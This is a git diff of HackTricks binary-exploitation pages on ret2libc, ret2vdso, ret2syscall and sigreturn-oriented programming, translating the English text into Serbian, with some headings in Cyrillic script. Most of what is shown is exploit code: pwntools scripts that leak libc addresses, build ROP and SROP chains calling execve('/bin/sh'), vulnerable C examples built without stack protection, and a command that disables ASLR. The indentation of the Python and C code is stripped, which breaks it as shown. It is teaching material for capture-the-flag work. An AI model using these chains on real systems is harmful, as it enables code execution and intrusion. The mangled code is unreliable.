@@ -90,54 +85,54 @@ log.info("ret gadget: " + hex(RET)) ######################## def generate_payload_aligned(rop): - payload1 = OFFSET + rop - if (len(payload1) % 16) == 0: - return payload1 +payload1 = OFFSET + rop +if (len(payload1) % 16) == 0: +return payload1 - else: - payload2 = OFFSET + p64(RET) + rop - if (len(payload2) % 16) == 0: - log.info("Payload aligned successfully") - return payload2 - else: - log.warning(f"I couldn't align the payload! Len: {len(payload1)}") - return payload1 +else: +payload2 = OFFSET + p64(RET) + rop +if (len(payload2) % 16) == 0: +log.info("Payload aligned successfully") +return payload2 +else: +log.warning(f"I couldn't align the payload! Len: {len(payload1)}") +return payload1 def get_addr(libc_func): - FUNC_GOT = ELF_LOADED.got[libc_func] - log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - rop1 = generate_payload_aligned(rop1) +FUNC_GOT = ELF_LOADED.got[libc_func] +log.info(libc_func + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +rop1 = generate_payload_aligned(rop1) - # Send our rop-chain payload - #P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received - print(P.clean()) # clean socket buffer (read all and print) - P.sendline(rop1) +# Send our rop-chain payload +#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received +print(P.clean()) # clean socket buffer (read all and print) +P.sendline(rop1) - # If binary is echoing back the payload, remove that message - recieved = P.recvline().strip() - if OFFSET[:30] in recieved: - recieved = P.recvline().strip() +# If binary is echoing back the payload, remove that message +recieved = P.recvline().strip() +if OFFSET[:30] in recieved: +recieved = P.recvline().strip() - # Parse leaked address - log.info(f"Len rop1: {len(rop1)}") - leak = u64(recieved.ljust(8, 
b"\x00")) - log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") +# Parse leaked address +log.info(f"Len rop1: {len(rop1)}") +leak = u64(recieved.ljust(8, b"\x00")) +log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}") - # Set lib base address - if LIBC: - LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base - print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") - log.info("LIBC base @ %s" % hex(LIBC.address)) +# Set lib base address +if LIBC: +LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base +print("If LIBC base doesn't end end 00, you might be using an icorrect libc library") +log.info("LIBC base @ %s" % hex(LIBC.address)) - # If not LIBC yet, stop here - else: - print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") - P.interactive() +# If not LIBC yet, stop here +else: +print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)") +P.interactive() - return hex(leak) +return hex(leak) get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base 
@@ -150,38 +145,38 @@ get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base ## Via One_gadget (https://github.com/david942j/one_gadget) # gem install one_gadget def get_one_gadgets(libc): - import string, subprocess - args = ["one_gadget", "-r"] - if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): - args += ["-b", libc.hex()] - else: - args += [libc] - try: - one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] - except: - print("One_gadget isn't installed") - one_gadgets = [] - return +import string, subprocess +args = ["one_gadget", "-r"] +if len(libc) == 40 and all(x in string.hexdigits for x in libc.hex()): +args += ["-b", libc.hex()] +else: +args += [libc] +try: +one_gadgets = [int(offset) for offset in subprocess.check_output(args).decode('ascii').strip().split()] +except: +print("One_gadget isn't installed") +one_gadgets = [] +return rop2 = b"" if USE_ONE_GADGET: - one_gadgets = get_one_gadgets(LIBC) - if one_gadgets: - rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains +one_gadgets = get_one_gadgets(LIBC) +if one_gadgets: +rop2 = p64(one_gadgets[0]) + "\x00"*100 #Usually this will fullfit the constrains ## Normal/Long exploitation if not rop2: - BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh - SYSTEM = LIBC.sym["system"] - EXIT = LIBC.sym["exit"] +BINSH = next(LIBC.search(b"/bin/sh")) #Verify with find /bin/sh +SYSTEM = LIBC.sym["system"] +EXIT = LIBC.sym["exit"] - log.info("POP_RDI %s " % hex(POP_RDI)) - log.info("bin/sh %s " % hex(BINSH)) - log.info("system %s " % hex(SYSTEM)) - log.info("exit %s " % hex(EXIT)) +log.info("POP_RDI %s " % hex(POP_RDI)) +log.info("bin/sh %s " % hex(BINSH)) +log.info("system %s " % hex(SYSTEM)) +log.info("exit %s " % hex(EXIT)) - rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) - rop2 = generate_payload_aligned(rop2) +rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT) 
+rop2 = generate_payload_aligned(rop2) print(P.clean()) @@ -189,41 +184,30 @@ P.sendline(rop2) P.interactive() #Interact with your shell :) ``` +## Uobičajeni problemi -## Common problems - -### MAIN_PLT = elf.symbols\['main'] not found - -If the "main" symbol does not exist (probably because it's a stripped binary). Then you can just find where is the main code: +### MAIN_PLT = elf.symbols\['main'] nije pronađen +Ako simbol "main" ne postoji (verovatno zato što je binarni fajl uklonjen). Tada možete jednostavno pronaći gde je glavni kod: ```python objdump -d vuln_binary | grep "\.text" Disassembly of section .text: 0000000000401080 <.text>: ``` - -and set the address manually: - +i ručno postavite adresu: ```python MAIN_PLT = 0x401080 ``` +### Puts не пронађен -### Puts not found +Ако бинарни фајл не користи Puts, требало би да **проверите да ли користи** -If the binary is not using Puts you should **check if it is using** +### `sh: 1: %s%s%s%s%s%s%s%s: не пронађен` -### `sh: 1: %s%s%s%s%s%s%s%s: not found` - -If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found` - -Try to **subtract 64 bytes to the address of "/bin/sh"**: +Ако нађете ову **грешку** након што сте креирали **све** експлоите: `sh: 1: %s%s%s%s%s%s%s%s: не пронађен` +Пробајте да **одузмете 64 бајта од адресе "/bin/sh"**: ```python BINSH = next(libc.search("/bin/sh")) - 64 ``` - -
- -{% embed url="https://websec.nl/" %} - {{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index a3a6c9ed5..1c4fcec1e 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -2,12 +2,11 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -There might be **gadgets in the vDSO region**, which is used to change from user mode to kernel mode. In these type of challenges, usually a kernel image is provided to dump the vDSO region. - -Following the example from [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) it's possible to see how it was possible to dump the vdso section and move it to the host with: +Mogu postojati **gadgets u vDSO regionu**, koji se koristi za prelazak iz korisničkog moda u kernel mod. U ovim vrstama izazova, obično se pruža kernel slika za dumpovanje vDSO regiona. +Prateći primer sa [https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/maze-of-mist/) moguće je videti kako je bilo moguće dumpovati vdso sekciju i premestiti je na host sa: ```bash # Find addresses cat /proc/76/maps @@ -33,9 +32,7 @@ echo '' | base64 -d | gzip -d - > vdso file vdso ROPgadget --binary vdso | grep 'int 0x80' ``` - -ROP gadgets found: - +Pronađeni ROP gadgeti: ```python vdso_addr = 0xf7ffc000 
@@ -54,13 +51,12 @@ or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb # 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd ``` - > [!CAUTION] -> Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) +> Imajte na umu kako bi moglo biti moguće **obići ASLR koristeći vdso** ako je kernel kompajliran sa CONFIG_COMPAT_VDSO, jer adresa vdso neće biti nasumična: [https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639](https://vigilance.fr/vulnerability/Linux-kernel-bypassing-ASLR-via-VDSO-11639) ### ARM64 -After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page: +Nakon dumpovanja i provere vdso sekcije binarnog fajla u kali 2023.2 arm64, nisam mogao pronaći nijedan zanimljiv gadget (nema načina da se kontrolišu registri iz vrednosti na steku ili da se kontroliše x30 za ret) **osim načina da se pozove SROP**. Pogledajte više informacija u primeru sa stranice: {{#ref}} srop-sigreturn-oriented-programming/srop-arm64.md diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index 444927dfd..33541c29c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md 
@@ -2,26 +2,25 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -This is similar to Ret2lib, however, in this case we won't be calling a function from a library. In this case, everything will be prepared to call the syscall `sys_execve` with some arguments to execute `/bin/sh`. This technique is usually performed on binaries that are compiled statically, so there might be plenty of gadgets and syscall instructions. +Ovo je slično Ret2lib, međutim, u ovom slučaju nećemo pozivati funkciju iz biblioteke. U ovom slučaju, sve će biti pripremljeno za pozivanje syscall `sys_execve` sa nekim argumentima za izvršavanje `/bin/sh`. Ova tehnika se obično primenjuje na binarne datoteke koje su statički kompajlirane, tako da može biti mnogo gadgeta i syscall instrukcija. -In order to prepare the call for the **syscall** it's needed the following configuration: +Da bismo pripremili poziv za **syscall**, potrebna je sledeća konfiguracija: -- `rax: 59 Specify sys_execve` -- `rdi: ptr to "/bin/sh" specify file to execute` -- `rsi: 0 specify no arguments passed` -- `rdx: 0 specify no environment variables passed` +- `rax: 59 Specifikujte sys_execve` +- `rdi: ptr do "/bin/sh" specifikujte datoteku za izvršavanje` +- `rsi: 0 specifikujte da nema prosleđenih argumenata` +- `rdx: 0 specifikujte da nema prosleđenih promenljivih okruženja` -So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area. +Dakle, u suštini, potrebno je napisati string `/bin/sh` negde i zatim izvršiti `syscall` (imajući u vidu potrebnu padding za kontrolu steka). Za to nam je potreban gadget da napišemo `/bin/sh` u poznatom području. > [!TIP] -> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. 
This can be combined with [**ret2shellcode**](../../stack-overflow/stack-shellcode/). +> Još jedan zanimljiv syscall koji se može pozvati je **`mprotect`** koji bi omogućio napadaču da **modifikuje dozvole stranice u memoriji**. Ovo se može kombinovati sa [**ret2shellcode**](../../stack-overflow/stack-shellcode/). -## Register gadgets - -Let's start by finding **how to control those registers**: +## Gadgeti za registre +Hajde da počnemo sa pronalaženjem **kako da kontrolišemo te registre**: ```bash ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x0000000000415664 : pop rax ; ret @@ -29,15 +28,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret" 0x00000000004101f3 : pop rsi ; ret 0x00000000004498b5 : pop rdx ; ret ``` +Sa ovim adresama je moguće **pisati sadržaj u stek i učitati ga u registre**. -With these addresses it's possible to **write the content in the stack and load it into the registers**. - -## Write string +## Pisanje stringa ### Writable memory -First you need to find a writable place in the memory - +Prvo treba da pronađete mesto u memoriji koje može da se piše ```bash gef> vmmap [ Legend: Code | Heap | Stack ] 
@@ -46,26 +43,20 @@ Start End Offset Perm Path 0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001 0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap] ``` - ### Write String in memory -Then you need to find a way to write arbitrary content in this address - +Zatim treba da pronađete način da upišete proizvoljan sadržaj na ovu adresu ```python ROPgadget --binary speedrun-001 | grep " : mov qword ptr \[" mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx ``` +### Automatizujte ROP lanac -### Automate ROP chain - -The following command creates a full `sys_execve` ROP chain given a static binary when there are write-what-where gadgets and syscall instructions: - +Sledeća komanda kreira kompletan `sys_execve` ROP lanac za dati statički binarni fajl kada postoje write-what-where gadgeti i syscall instrukcije: ```bash ROPgadget --binary vuln --ropchain ``` - -#### 32 bits - +#### 32 bita ```python ''' Lets write "/bin/sh" to 0x6b6000 @@ -87,9 +78,7 @@ rop += popRax rop += p32(0x6b6000 + 4) rop += writeGadget ``` - -#### 64 bits - +#### 64 bita ```python ''' Lets write "/bin/sh" to 0x6b6000 @@ -105,17 +94,15 @@ rop += popRax rop += p64(0x6b6000) # Writable memory rop += writeGadget #Address to: mov qword ptr [rax], rdx ``` +## Nedostatak Gadžeta -## Lacking Gadgets - -If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack: +Ako vam **nedostaju gadžeti**, na primer da napišete `/bin/sh` u memoriji, možete koristiti **SROP tehniku da kontrolišete sve vrednosti registara** (uključujući RIP i registre parametara) iz steka: {{#ref}} ../srop-sigreturn-oriented-programming/ {{#endref}} -## Exploit Example - +## Primer Eksploatacije ```python from pwn import * 
@@ -182,14 +169,13 @@ target.sendline(payload) target.interactive() ``` - -## Other Examples & References +## Ostali Primeri i Reference - [https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html) - - 64 bits, no PIE, nx, write in some memory a ROP to call `execve` and jump there. +- 64 bita, bez PIE, nx, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. - [https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof_static/bkp16_simplecalc/index.html) - - 64 bits, nx, no PIE, write in some memory a ROP to call `execve` and jump there. In order to write to the stack a function that performs mathematical operations is abused +- 64 bita, nx, bez PIE, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. Da bi se upisalo na stek, zloupotrebljava se funkcija koja vrši matematičke operacije. - [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html) - - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there. +- 64 bita, bez PIE, nx, BF kanar, upisati u neku memoriju ROP za pozivanje `execve` i skočiti tamo. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index 5b912eab8..3affeb1ab 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md 
@@ -2,80 +2,73 @@ {{#include ../../../banners/hacktricks-training.md}} -Find an introduction to arm64 in: +Pronađite uvod u arm64 u: {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} -## Code +## Kod -We are going to use the example from the page: +Koristićemo primer sa stranice: {{#ref}} ../../stack-overflow/ret2win/ret2win-arm64.md {{#endref}} - ```c #include #include void win() { - printf("Congratulations!\n"); +printf("Congratulations!\n"); } void vulnerable_function() { - char buffer[64]; - read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability +char buffer[64]; +read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability } int main() { - vulnerable_function(); - return 0; +vulnerable_function(); +return 0; } ``` - -Compile without pie and canary: - +Kompajlirati bez pie i kanarinca: ```bash clang -o ret2win ret2win.c -fno-stack-protector ``` - ## Gadgets -In order to prepare the call for the **syscall** it's needed the following configuration: +Da bi se pripremio poziv za **syscall**, potrebna je sledeća konfiguracija: - `x8: 221 Specify sys_execve` - `x0: ptr to "/bin/sh" specify file to execute` - `x1: 0 specify no arguments passed` - `x2: 0 specify no environment variables passed` -Using ROPgadget.py I was able to locate the following gadgets in the libc library of the machine: - +Korišćenjem ROPgadget.py, uspeo sam da lociram sledeće gadget-e u libc biblioteci mašine: ```armasm ;Load x0, x1 and x3 from stack and x5 and call x5 0x0000000000114c30: - ldp x3, x0, [sp, #8] ; - ldp x1, x4, [sp, #0x18] ; - ldr x5, [sp, #0x58] ; - ldr x2, [sp, #0xe0] ; - blr x5 +ldp x3, x0, [sp, #8] ; +ldp x1, x4, [sp, #0x18] ; +ldr x5, [sp, #0x58] ; +ldr x2, [sp, #0xe0] ; +blr x5 ;Move execve syscall (0xdd) to x8 and call it 0x00000000000bb97c : - nop ; - nop ; - mov x8, #0xdd ; - svc #0 +nop ; +nop ; +mov x8, #0xdd ; +svc #0 ``` - -With the previous gadgets we can control 
all the needed registers from the stack and use x5 to jump to the second gadget to call the syscall. +Sa prethodnim gadgetima možemo kontrolisati sve potrebne registre sa steka i koristiti x5 da skočimo na drugi gadget kako bismo pozvali syscall. > [!TIP] -> Note that knowing this info from the libc library also allows to do a ret2libc attack, but lets use it for this current example. - -### Exploit +> Imajte na umu da poznavanje ovih informacija iz libc biblioteke takođe omogućava izvođenje ret2libc napada, ali hajde da to iskoristimo za ovaj trenutni primer. +### Eksploatacija ```python from pwn import * @@ -124,5 +117,4 @@ p.sendline(payload) p.interactive() ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 20e07f3f2..cac686061 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md 
@@ -2,25 +2,24 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**`Sigreturn`** is a special **syscall** that's primarily used to clean up after a signal handler has completed its execution. Signals are interruptions sent to a program by the operating system, often to indicate that some exceptional situation has occurred. When a program receives a signal, it temporarily pauses its current work to handle the signal with a **signal handler**, a special function designed to deal with signals. +**`Sigreturn`** je posebna **syscall** koja se prvenstveno koristi za čišćenje nakon što signalni handler završi svoju izvršavanje. Signali su prekidi koje operativni sistem šalje programu, često da bi ukazali na to da se dogodila neka izuzetna situacija. Kada program primi signal, privremeno pauzira svoj trenutni rad da bi obradio signal pomoću **signal handler-a**, posebne funkcije dizajnirane za rukovanje signalima. -After the signal handler finishes, the program needs to **resume its previous state** as if nothing happened. This is where **`sigreturn`** comes into play. It helps the program to **return from the signal handler** and restores the program's state by cleaning up the stack frame (the section of memory that stores function calls and local variables) that was used by the signal handler. +Nakon što signalni handler završi, program treba da **nastavi svoje prethodno stanje** kao da se ništa nije dogodilo. Tu dolazi do izražaja **`sigreturn`**. Pomaže programu da **vrati iz signal handler-a** i obnavlja stanje programa čišćenjem steka (odeljak memorije koji čuva pozive funkcija i lokalne promenljive) koji je koristio signalni handler. 
-The interesting part is how **`sigreturn`** restores the program's state: it does so by storing **all the CPU's register values on the stack.** When the signal is no longer blocked, **`sigreturn` pops these values off the stack**, effectively resetting the CPU's registers to their state before the signal was handled. This includes the stack pointer register (RSP), which points to the current top of the stack. +Zanimljiv deo je kako **`sigreturn`** obnavlja stanje programa: to čini tako što čuva **sve vrednosti CPU registara na steku.** Kada signal više nije blokiran, **`sigreturn` uklanja ove vrednosti sa steka**, efikasno resetujući registre CPU-a na njihov stanje pre nego što je signal obrađen. Ovo uključuje registar pokazivača steka (RSP), koji pokazuje na trenutni vrh steka. > [!CAUTION] -> Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry values** we would like it to load in the **stack** it's possible to **control** all the register values and therefore **call** for example the syscall `execve` with `/bin/sh`. +> Pozivanje syscall-a **`sigreturn`** iz ROP lanca i **dodavanje registarskih vrednosti** koje bismo želeli da učitamo u **stek** omogućava nam da **kontrolišemo** sve registarske vrednosti i stoga **pozovemo** na primer syscall `execve` sa `/bin/sh`. 
-Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls: +Napomena kako bi ovo bila **vrsta Ret2syscall** koja olakšava kontrolu parametara za pozivanje drugih Ret2syscall-a: {{#ref}} ../rop-syscall-execv/ {{#endref}} -If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)): - +Ako vas zanima, ovo je **sigcontext struktura** koja se čuva na steku da bi se kasnije povratile vrednosti (dijagram iz [**ovde**](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html)): ``` +--------------------+--------------------+ | rt_sigeturn() | uc_flags | @@ -56,15 +55,13 @@ If you are curious this is the **sigcontext structure** stored in the stack to l | __reserved | sigmask | +--------------------+--------------------+ ``` - -For a better explanation check also: +Za bolje objašnjenje pogledajte takođe: {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} -## Example - -You can [**find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) where the call to signeturn is constructed via ROP (putting in rxa the value `0xf`), although this is the final exploit from there: +## Primer +Možete [**pronaći primer ovde**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) gde se poziv na signeturn konstruira putem ROP (stavljajući u rxa vrednost `0xf`), iako je ovo konačni exploit odatle: ```python from pwn import * 
@@ -91,9 +88,7 @@ payload += bytes(frame) p.sendline(payload) p.interactive() ``` - -Check also the [**exploit from here**](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) where the binary was already calling `sigreturn` and therefore it's not needed to build that with a **ROP**: - +Proverite takođe [**eksploit ovde**](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) gde je binarni fajl već pozivao `sigreturn` i stoga nije potrebno to graditi sa **ROP**: ```python from pwn import * 
@@ -126,20 +121,19 @@ target.sendline(payload) # Send the target payload # Drop to an interactive shell target.interactive() ``` - -## Other Examples & References +## Ostali Primeri i Reference - [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared) - [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop) - [https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html) - - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary. +- Assembly binarni program koji omogućava **pisanje na stek** i zatim poziva **`sigreturn`** syscall. Moguće je napisati na stek [**ret2syscall**](../rop-syscall-execv/) putem **sigreturn** strukture i pročitati flag koji se nalazi unutar memorije binarnog programa. - [https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html) - - Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](../rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`). +- Assembly binarni program koji omogućava **pisanje na stek** i zatim poziva **`sigreturn`** syscall. Moguće je napisati na stek [**ret2syscall**](../rop-syscall-execv/) putem **sigreturn** strukture (binarni program sadrži string `/bin/sh`). - [https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html) - - 64 bits, no relro, no canary, nx, no pie. 
Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell. +- 64 bita, bez relro, bez kanarija, nx, bez pie. Jednostavna buffer overflow napada koristeći `gets` funkciju sa nedostatkom gadgeta koji izvršava [**ret2syscall**](../rop-syscall-execv/). ROP lanac piše `/bin/sh` u `.bss` ponovnim pozivanjem gets, zloupotrebljava **`alarm`** funkciju da postavi eax na `0xf` kako bi pozvao **SROP** i izvršio shell. - [https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html) - - 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it. +- 64 bita assembly program, bez relro, bez kanarija, nx, bez pie. Tok omogućava pisanje na stek, kontrolu nekoliko registara, i pozivanje syscall-a, a zatim poziva `exit`. Izabrani syscall je `sigreturn` koji će postaviti registre i premestiti `eip` da pozove prethodnu syscall instrukciju i izvrši `memprotect` da postavi binarni prostor na `rwx` i postavi ESP u binarnom prostoru. Prateći tok, program će ponovo pozvati read u ESP, ali u ovom slučaju ESP će pokazivati na sledeću instrukciju, tako da će prosleđivanje shellcode-a napisati kao sledeću instrukciju i izvršiti je. 
- [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection) - - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. +- SROP se koristi za davanje privilegija izvršenja (memprotect) mestu gde je shellcode postavljen. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index ad3191732..0d3b87e87 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -2,10 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## Pwntools example - -This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**: +## Pwntools primer +Ovaj primer kreira ranjivi binarni fajl i koristi ga. Binarni fajl **čita u stek** i zatim poziva **`sigreturn`**: ```python from pwn import * 
@@ -33,55 +32,49 @@ p = process(binary.path) p.send(bytes(frame)) p.interactive() ``` +## bof пример -## bof example - -### Code - +### Код ```c #include #include #include void do_stuff(int do_arg){ - if (do_arg == 1) - __asm__("mov x8, 0x8b; svc 0;"); - return; +if (do_arg == 1) +__asm__("mov x8, 0x8b; svc 0;"); +return; } char* vulnerable_function() { - char buffer[64]; - read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability +char buffer[64]; +read(STDIN_FILENO, buffer, 0x1000); // <-- bof vulnerability - return buffer; +return buffer; } char* gen_stack() { - char use_stack[0x2000]; - strcpy(use_stack, "Hello, world!"); - char* b = vulnerable_function(); - return use_stack; +char use_stack[0x2000]; +strcpy(use_stack, "Hello, world!"); +char* b = vulnerable_function(); +return use_stack; } int main(int argc, char **argv) { - char* b = gen_stack(); - do_stuff(2); - return 0; +char* b = gen_stack(); +do_stuff(2); +return 0; } ``` - -Compile it with: - +Kompajlirati sa: ```bash clang -o srop srop.c -fno-stack-protector echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR ``` +## Eksploatacija -## Exploit - -The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`. - +Eksploatacija koristi bof da se vrati na poziv **`sigreturn`** i pripremi stek za poziv **`execve`** sa pokazivačem na `/bin/sh`. ```python from pwn import * 
